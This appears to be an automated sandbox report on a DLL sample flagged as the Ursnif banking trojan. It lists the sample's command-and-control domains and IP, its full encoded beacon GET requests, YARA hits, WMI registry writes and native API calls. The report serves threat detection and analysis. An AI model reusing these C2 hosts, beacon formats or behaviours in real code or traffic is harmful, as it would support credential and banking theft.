Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp	String found in binary or memory: https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT
Source: 6.dll	String found in binary or memory: https://www.digicert.com/CPS0
Source: 6.dll	String found in binary or memory: https://www.globalsign.com/repository/0
Source: 6.dll	String found in binary or memory: https://www.globalsign.com/repository/03

Source: unknown

DNS traffic detected: queries for: windows.update3.com

Source: global traffic	HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website
Source: global traffic	HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: berukoneru.website

Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

System Summary:

PE file has a writeable .text section

Source: 6.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Writes or reads registry keys via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Uses 32bit PE files

Source: 6.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Detected potential crypto function

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1B084	4_2_00F1B084
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F13373	4_2_00F13373
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1294D	4_2_00F1294D

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F16C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	4_2_00F16C06
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F165B4 NtMapViewOfSection,	4_2_00F165B4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F17562 GetProcAddress,NtCreateSection,memset,	4_2_00F17562
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_00F1B2A9 NtQueryVirtualMemory,	4_2_00F1B2A9

Sample file is different than original file name gathered from version info

Source: 6.dll	Binary or memory string: OriginalFilenameSymErr.exeT vs 6.dll
Source: 6.dll	Binary or memory string: OriginalFilenameNsc.exe. vs 6.dll
Source: 6.dll	Binary or memory string: OriginalFilenamebyInstallHelper.exe. vs 6.dll
Source: 6.dll	Binary or memory string: OriginalFilenameBgRegister.exe4 vs 6.dll

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

PE file contains strange resources

Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6.dll	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
